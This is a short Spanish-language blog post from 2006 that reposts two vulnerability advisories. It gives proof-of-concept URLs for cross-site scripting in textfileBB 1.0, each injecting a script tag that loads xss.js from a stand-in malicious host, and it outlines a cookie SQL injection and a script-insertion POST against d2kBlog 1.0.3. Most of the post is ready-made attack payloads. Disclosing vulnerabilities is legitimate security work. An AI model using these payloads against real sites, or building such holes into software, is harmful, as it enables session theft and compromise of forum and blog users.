ecoestadistica.com

miércoles, marzo 08, 2006

Vulnerabilidades...

textfileBB <= 1.0 Multiple XSS

software: textfileBB
vendedor website: http://tfbb.jcink.com/

Prueba de Concepto:

http://example.com/messanger.php?mess=%3Cscript%20src=http://webmaliciosa.
ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E

http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscri
pt%20src=http://webmaliciosa.ws/xss.js%3E%3C/body%3E%3C/html%3E

Credito: retard
--------------------------------------------------------------------------------------

d2kBlog Multiple Vulnerabilidades

producto : d2kBlog <= 1.0.3
Vendedor: http://www.d2ksoft.com/

Prueba de Concepto:

SQL_Injection :
Cookie : memName=[SQL_Injection]

Script Insertion :
Default.asp , POST : name=KAPDA&email=KAPDA&msg=&submit=Send+Message

ecoestadistica.com